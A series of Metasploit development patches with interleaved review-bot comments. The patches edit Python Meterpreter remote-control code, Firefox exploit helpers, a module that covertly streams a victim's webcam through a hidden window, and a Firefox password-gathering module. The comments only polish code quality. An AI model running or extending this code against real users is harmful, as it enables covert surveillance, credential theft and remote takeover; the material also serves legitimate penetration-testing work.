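Review bot: `STDProcessBuffer.read` takes `data_lock` with `acquire()` and releases it by hand, so an exception between the two calls (for example a non-integer `l` in the slice) leaves the lock held and blocks the reader thread in `run`. `threading.RLock` is a context manager, so `with self.data_lock:` around the body releases it on every path; `run` in the hunk above uses the same manual pattern. A docstring noting that `read` consumes what it returns would also help, now that the non-consuming `peek` is gone.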
@@ -285,7 +251,7 @@ class PythonMeterpreter(object): self.channels = {} self.interact_channels = [] self.processes = {} - for func in list(filter(lambda x: x.startswith('_core'), dir(self))): + for func in filter(lambda x: x.startswith('_core'), dir(self)): self.extension_functions[func[1:]] = getattr(self, func) self.running = True @@ -299,7 +265,6 @@ class PythonMeterpreter(object): return func def add_channel(self, channel): - assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket))) idx = 0 while idx in self.channels: idx += 1 @@ -321,7 +286,7 @@ class PythonMeterpreter(object): break req_length, req_type = struct.unpack('>II', request) req_length -= 8 - request = bytes() + request = '' while len(request) < req_length: request += self.socket.recv(4096) response = self.create_response(request) @@ -329,17 +294,17 @@ class PythonMeterpreter(object): else: channels_for_removal = [] # iterate over the keys because self.channels could be modified if one is closed - channel_ids = list(self.channels.keys()) + channel_ids = self.channels.keys() for channel_id in channel_ids: channel = self.channels[channel_id] - data = bytes() + data = '' if isinstance(channel, STDProcess): if not channel_id in self.interact_channels: continue - if channel.stderr_reader.is_read_ready(): - data = channel.stderr_reader.read() - elif channel.stdout_reader.is_read_ready(): + if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read() + elif channel.stderr_reader.is_read_ready(): + data = channel.stderr_reader.read() elif channel.poll() != None: self.handle_dead_resource_channel(channel_id) elif isinstance(channel, MeterpreterSocketClient): @@ -347,7 +312,7 @@ class PythonMeterpreter(object): try: d = channel.recv(1) except socket.error: - d = bytes() + d = '' if len(d) == 0: self.handle_dead_resource_channel(channel_id) break 
@@ -392,13 +357,13 @@ class PythonMeterpreter(object): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE - preloadlib_methods = list(self.extension_functions.keys()) + preloadlib_methods = self.extension_functions.keys() symbols_for_extensions = {'meterpreter':self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], '', 'exec')) - postloadlib_methods = list(self.extension_functions.keys()) - new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods)) + postloadlib_methods = self.extension_functions.keys() + new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) for method in new_methods: response += tlv_pack(TLV_TYPE_METHOD, method) return ERROR_SUCCESS, response @@ -421,10 +386,10 @@ class PythonMeterpreter(object): if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] - if isinstance(channel, subprocess.Popen): - channel.kill() - elif isinstance(channel, MeterpreterFile): + if isinstance(channel, file): channel.close() + elif isinstance(channel, subprocess.Popen): + channel.kill() elif isinstance(channel, MeterpreterSocket): channel.close() else: @@ -440,7 +405,7 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] result = False - if isinstance(channel, MeterpreterFile): + if isinstance(channel, file): result = channel.tell() >= os.fstat(channel.fileno()).st_size response += tlv_pack(TLV_TYPE_BOOL, result) return ERROR_SUCCESS, response 
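Review bot: The compressed-TLV guard at the top of the first hunk returns a bare `ERROR_FAILURE`, while the success path returns `ERROR_SUCCESS, response`. The dispatcher shown later in this patch unpacks `result, resp = handler(request, resp)`, so the bare return fails the unpacking and only surfaces as a failure through the broad `except` there. `return ERROR_FAILURE, response` would match the other handlers. `data_tlv['type']` also raises `KeyError` when the request carries no data TLV, because `packet_get_tlv` returns `{}` in that case. The handler's signature is outside the hunk.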
@@ -467,13 +432,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] data = '' - if isinstance(channel, STDProcess): + if isinstance(channel, file): + data = channel.read(length) + elif isinstance(channel, STDProcess): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read(length) - elif isinstance(channel, MeterpreterFile): - data = channel.read(length) elif isinstance(channel, MeterpreterSocket): data = channel.recv(length) else: @@ -489,13 +454,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] l = len(channel_data) - if isinstance(channel, subprocess.Popen): + if isinstance(channel, file): + channel.write(channel_data) + elif isinstance(channel, subprocess.Popen): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response - channel.write(channel_data) - elif isinstance(channel, MeterpreterFile): - channel.write(channel_data) + channel.stdin.write(channel_data) elif isinstance(channel, MeterpreterSocket): try: l = channel.send(channel_data) 
@@ -520,17 +485,13 @@ class PythonMeterpreter(object): if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: - if DEBUGGING: - print('[*] running method ' + handler_name) + #print("[*] running method {0}".format(handler_name)) result, resp = handler(request, resp) - except Exception: - if DEBUGGING: - print('[-] method ' + handler_name + ' resulted in an error') - traceback.print_exc(file=sys.stderr) + except Exception, err: + #print("[-] method {0} resulted in an error".format(handler_name)) result = ERROR_FAILURE else: - if DEBUGGING: - print('[-] method ' + handler_name + ' was requested but does not exist') + #print("[-] method {0} was requested but does not exist".format(handler_name)) result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp @@ -538,9 +499,6 @@ class PythonMeterpreter(object): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if hasattr(os, 'setsid'): - try: - os.setsid() - except OSError: - pass + os.setsid() met = PythonMeterpreter(s) met.run() From 21be4f21a60698ee2004ed2f8b1a4f5a58905fa0 Mon Sep 17 00:00:00 2001 From: Brandon Turner <brandon_turner@rapid7.com> Date: Fri, 6 Jun 2014 09:52:01 -0500 Subject: [PATCH 499/853] Bump version to 4.9.3 --- lib/msf/core/framework.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index 302d26a956..120f8693e2 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -18,7 +18,7 @@ class Framework Major = 4 Minor = 9 - Point = 2 + Point = 3 Release = "-dev" if(Point) From 82464bd6aa93e1c76e1960603615ddf33dde7a7b Mon Sep 17 00:00:00 2001 From: Brandon Turner <brandon_turner@rapid7.com> Date: Fri, 6 Jun 2014 10:16:44 -0500 Subject: [PATCH 500/853] Update version spec --- spec/lib/msf/core/framework_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
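Review bot: `except Exception, err:` binds `err` and never uses it, and with the `print` calls commented out a failing handler leaves no trace beyond `ERROR_FAILURE`. `except Exception:` drops the unused name and parses on both Python 2 and 3. The three commented-out `print` lines are dead code; either delete them or keep a module-level debug switch, like the `DEBUGGING` flag this change removes, so diagnostics can be enabled without editing the file.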
diff --git a/spec/lib/msf/core/framework_spec.rb b/spec/lib/msf/core/framework_spec.rb index c6eadf591b..7c96718f7d 100644 --- a/spec/lib/msf/core/framework_spec.rb +++ b/spec/lib/msf/core/framework_spec.rb @@ -6,7 +6,7 @@ require 'msf/core/framework' describe Msf::Framework do describe "#version" do - CURRENT_VERSION = "4.9.2-dev" + CURRENT_VERSION = "4.9.3-dev" subject do described_class.new From 7c762ad42c76d2d954b138c2bfff941cba85649b Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:18:39 -0500 Subject: [PATCH 501/853] Fix some minor bugs in webrtc stuff, inline API code. --- data/webcam/answerer.html | 7 ++++--- data/webcam/offerer.html | 14 +++++++++----- .../exploit/remote/firefox_privilege_escalation.rb | 4 ++-- lib/msf/core/post/webrtc.rb | 10 +++++----- modules/post/firefox/gather/webcam_chat.rb | 7 ++++--- 5 files changed, 24 insertions(+), 18 deletions(-) diff --git a/data/webcam/answerer.html b/data/webcam/answerer.html index dadb7e32f5..13542c299d 100644 --- a/data/webcam/answerer.html +++ b/data/webcam/answerer.html @@ -10,7 +10,7 @@ height: 480px; width: 640px; border-radius: 15px; - -moz-border-raidus: 15px; + -moz-border-radius: 15px; background-color: black; position: absolute; left: 50; @@ -26,7 +26,7 @@ height: 180px; width: 200px; border-radius: 15px; - -moz-border-raidus: 15px; + -moz-border-radius: 15px; background-color: #9B9B9B; position: absolute; top: 480; @@ -66,8 +66,9 @@ left: 10; } </style> -<script src="=WEBRTCAPIJS="> </script> <script> + =WEBRTCAPIJS= + window.onerror = function(e) { document.getElementById("message").innerHTML = "Error: " + e.toString(); } diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html index f52a15e352..0cfca566da 100644 --- a/data/webcam/offerer.html +++ b/data/webcam/offerer.html 
@@ -84,9 +84,11 @@ } </style> - <script src="api.js"> </script> <script> + =WEBRTCAPIJS= + var channel = '=CHANNEL='; + var myChannel = channel; var websocket = new WebSocket('ws://=SERVER='); websocket.onopen = function() { @@ -136,10 +138,12 @@ }; window.onload = function() { - getUserMedia(function(stream) { - peer.addStream(stream); - peer.startBroadcasting(); - }); + setTimeout(function(){ + getUserMedia(function(stream) { + peer.addStream(stream); + peer.startBroadcasting(); + }); + }, 500); }; function getUserMedia(callback) { diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index 0b39034603..607509e900 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -14,11 +14,11 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # privileged javascript context # @return [String] the results that were sent back. This can be achieved through # calling the "send" function, or by just returning the value in +js+ - def js_exec(js) + def js_exec(js, timeout=30) print_status "Running the privileged javascript..." token = "[[#{Rex::Text.rand_text_alpha(8)}]]" session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") - session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + session.shell_read_until_token("[!JAVASCRIPT]", 0, 30) end # Puts the shellcode into memory, adds X flag, and calls it diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb index 342bd2e737..83250a3af6 100644 --- a/lib/msf/core/post/webrtc.rb +++ b/lib/msf/core/post/webrtc.rb 
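Review bot: `js_exec` gains a `timeout=30` parameter, but the body passes the literal `30` to `shell_read_until_token`, so the argument is ignored and the previous `datastore['TIMEOUT']` setting no longer has any effect. Passing it through, `session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)`, makes the signature honest. The YARD block above the method should also gain `# @param timeout [Integer] seconds to wait for the result`.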
@@ -12,13 +12,13 @@ module Msf::Post::WebRTC interface = load_interface('answerer.html') api = load_api_code - tmp_api = Tempfile.new(['api', '.js']) - tmp_api.binmode - tmp_api.write(api) - tmp_api.close + # tmp_api = Tempfile.new(['api', '.js']) + # tmp_api.binmode + # tmp_api.write(api) + # tmp_api.close interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, File.basename(tmp_api.path)) + interface = interface.gsub(/\=WEBRTCAPIJS\=/, api) interface = interface.gsub(/\=RHOST\=/, rhost) interface = interface.gsub(/\=CHANNEL\=/, channel) interface = interface.gsub(/\=OFFERERID\=/, offerer_id) diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index 6871e66997..17b451c664 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -52,6 +52,7 @@ class Metasploit3 < Msf::Post interface = load_interface('offerer.html') api = load_api_code + interface.gsub!(/\=WEBRTCAPIJS\=/, api) interface.gsub!(/\=SERVER\=/, server) interface.gsub!(/\=CHANNEL\=/, channel) interface.gsub!(/\=OFFERERID\=/, offerer_id) @@ -60,8 +61,6 @@ class Metasploit3 < Msf::Post api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); " end - interface.gsub!('<script src="api.js"> </script>', "<script>#{api}</script>") - url = if datastore['CLOSE'] '"about:blank"' else @@ -71,14 +70,16 @@ class Metasploit3 < Msf::Post %Q| (function(send){ try { + var AppShellService = Components .classes["@mozilla.org/appshell/appShellService;1"] .getService(Components.interfaces.nsIAppShellService); var html = "#{Rex::Text.encode_base64(interface)}"; var url = #{url}; - var win = AppShellService.hiddenDOMWindow.open(url, "_self", "width=500,height=500"); + AppShellService.hiddenDOMWindow.openDialog(url, 'xxx'); send("Streaming webcam..."); + } catch (e) { send(e); } From 4a9f50bb60b4c460c197c95666da4fc414ef87b4 Mon Sep 17 00:00:00 2001 
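Review bot: `interface.gsub(/\=WEBRTCAPIJS\=/, api)` in `connect_video_chat` uses the API source as a gsub replacement string, where backslash sequences such as `\\` and `\1` are interpreted, so any backslash in the JavaScript is altered on its way into the page. The block form inserts the text literally: `interface.gsub(/\=WEBRTCAPIJS\=/) { api }`. The same applies to `interface.gsub!(/\=WEBRTCAPIJS\=/, api)` in the `webcam_chat.rb` hunk on this line. The four commented-out `tmp_api` lines should be deleted rather than kept as comments.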
From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:20:40 -0500 Subject: [PATCH 502/853] Clean up some dead code. --- lib/msf/core/post/webrtc.rb | 17 +++++------------ modules/post/firefox/gather/webcam_chat.rb | 1 - 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb index 83250a3af6..0f89b4bd4a 100644 --- a/lib/msf/core/post/webrtc.rb +++ b/lib/msf/core/post/webrtc.rb @@ -10,18 +10,10 @@ module Msf::Post::WebRTC # def connect_video_chat(server, channel, offerer_id) interface = load_interface('answerer.html') - api = load_api_code - - # tmp_api = Tempfile.new(['api', '.js']) - # tmp_api.binmode - # tmp_api.write(api) - # tmp_api.close - - interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, api) - interface = interface.gsub(/\=RHOST\=/, rhost) - interface = interface.gsub(/\=CHANNEL\=/, channel) - interface = interface.gsub(/\=OFFERERID\=/, offerer_id) + interface.gsub!(/\=SERVER\=/, server) + interface.gsub!(/\=RHOST\=/, rhost) + interface.gsub!(/\=CHANNEL\=/, channel) + interface.gsub!(/\=OFFERERID\=/, offerer_id) tmp_interface = Tempfile.new(['answerer', '.html']) tmp_interface.binmode @@ -45,6 +37,7 @@ module Msf::Post::WebRTC interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name) interface_code = '' ::File.open(interface_path) { |f| interface_code = f.read } + interface_code.gsub!(/\=WEBRTCAPIJS\=/, load_api_code) interface_code end diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index 17b451c664..c90ef06a86 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb 
@@ -52,7 +52,6 @@ class Metasploit3 < Msf::Post interface = load_interface('offerer.html') api = load_api_code - interface.gsub!(/\=WEBRTCAPIJS\=/, api) interface.gsub!(/\=SERVER\=/, server) interface.gsub!(/\=CHANNEL\=/, channel) interface.gsub!(/\=OFFERERID\=/, offerer_id) From d990fb499952c26a4039e38ffa52687f5814d245 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:24:45 -0500 Subject: [PATCH 503/853] Remove a number of stray edits and bs. --- data/webcam/offerer.html | 1 - .../remote/firefox_privilege_escalation.rb | 2 +- lib/msf/core/payload/firefox.rb | 1 - .../browser/firefox_proto_crmfrequest.rb | 2 -- .../singles/firefox/shell_reverse_tcp_ssl.rb | 36 ------------------- .../singles/nodejs/shell_reverse_tcp_ssl.rb | 7 ++++ 6 files changed, 8 insertions(+), 41 deletions(-) delete mode 100644 modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html index 0cfca566da..c52ddb244b 100644 --- a/data/webcam/offerer.html +++ b/data/webcam/offerer.html @@ -88,7 +88,6 @@ =WEBRTCAPIJS= var channel = '=CHANNEL='; - var myChannel = channel; var websocket = new WebSocket('ws://=SERVER='); websocket.onopen = function() { diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index 607509e900..a927911220 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -18,7 +18,7 @@ module Exploit::Remote::FirefoxPrivilegeEscalation print_status "Running the privileged javascript..." token = "[[#{Rex::Text.rand_text_alpha(8)}]]" session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") - session.shell_read_until_token("[!JAVASCRIPT]", 0, 30) + session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout) end # Puts the shellcode into memory, adds X flag, and calls it 
diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb index 8921f0124a..a958c6f5af 100644 --- a/lib/msf/core/payload/firefox.rb +++ b/lib/msf/core/payload/firefox.rb @@ -34,7 +34,6 @@ module Msf::Payload::Firefox return function(request, context, stream, offset, count) { buffer += NetUtil.readInputStreamToString(stream, count); if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) { - if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) { cb(m[2]); buffer = ''; diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index e8f6441a73..2b24b83cc1 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -67,11 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending the malicious addon") send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' }) else - File.write('/tmp/ff.html', generate_html(target_info)) print_status("Sending HTML") send_response_html(cli, generate_html(target_info)) end - end def generate_html(target_info) diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb deleted file mode 100644 index 1a073d9fb5..0000000000 --- a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb +++ /dev/null 
@@ -1,36 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'msf/core/handler/reverse_tcp_ssl' -require 'msf/base/sessions/command_shell' -require 'msf/base/sessions/command_shell_options' - -module Metasploit3 - - include Msf::Payload::Single - include Msf::Payload::Firefox - include Msf::Sessions::CommandShellOptions - - def initialize(info={}) - super(merge_info(info, - 'Name' => 'Command Shell, Reverse TCP SSL (via Firefox XPCOM script)', - 'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API}, - 'Author' => ['joev'], - 'License' => BSD_LICENSE, - 'Platform' => 'firefox', - 'Arch' => ARCH_FIREFOX, - 'Handler' => Msf::Handler::ReverseTcpSsl, - 'Session' => Msf::Sessions::CommandShell, - 'PayloadType' => 'firefox' - )) - end - - def generate - # reverse_connect(:ssl => true) - "" - end - -end diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index c6aa8cba84..5e14658ae1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -30,6 +30,13 @@ module Metasploit3 )) end + # + # Constructs the payload + # + def generate + super + command_string + end + # # Returns the JS string to use for execution # From 496be5c3365f91e772a801f8229fceb2a6222ed7 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:26:45 -0500 Subject: [PATCH 504/853] Ensure command_shell_options is present. --- modules/payloads/singles/firefox/shell_bind_tcp.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index 1312b3c3fe..377c25a624 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb 
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -6,6 +6,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' module Metasploit3 From a45a5631f5080b6dce12ddc3129eea5011bd5f04 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:40:55 -0500 Subject: [PATCH 505/853] Make window invisible. --- modules/post/firefox/gather/passwords.rb | 8 ++++++-- modules/post/firefox/gather/webcam_chat.rb | 2 +- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index 24130d0f4e..819ac3c81b 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -37,8 +37,12 @@ class Metasploit3 < Msf::Post entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) } end - file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json) - print_good("Saved #{passwords.length} passwords to #{file}") + if passwords.length > 0 + file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json) + print_good("Saved #{passwords.length} passwords to #{file}") + else + print_warning("No passwords were found in Firefox.") + end rescue JSON::ParserError => e print_warning(results) end diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index c90ef06a86..104dfddd20 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Post var html = "#{Rex::Text.encode_base64(interface)}"; var url = #{url}; - AppShellService.hiddenDOMWindow.openDialog(url, 'xxx'); + AppShellService.hiddenDOMWindow.open(url, '_self'); send("Streaming webcam..."); } catch (e) { From a33de66da4d475a2cbf30918f77768654a08f49a Mon Sep 17 00:00:00 2001 
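Review bot: In the `passwords.rb` hunk, `if passwords.length > 0` is more idiomatic as `if passwords.any?`, or as `passwords.empty?` with the two branches swapped. The `rescue JSON::ParserError => e` below it never uses `e`, so `rescue JSON::ParserError` is enough. The MIME type passed to `store_loot` would be more accurate as `"application/json"`. The enclosing method starts outside the hunk.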
From: joev <joev@metasploit.com> Date: Fri, 6 Jun 2014 16:52:00 -0500 Subject: [PATCH 506/853] Fix transparent background, add VISIBLE option. --- data/webcam/offerer.html | 4 ++++ modules/post/firefox/gather/webcam_chat.rb | 9 ++++++++- 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html index c52ddb244b..8bd7cb5a48 100644 --- a/data/webcam/offerer.html +++ b/data/webcam/offerer.html @@ -2,6 +2,10 @@ <head> <title>Video session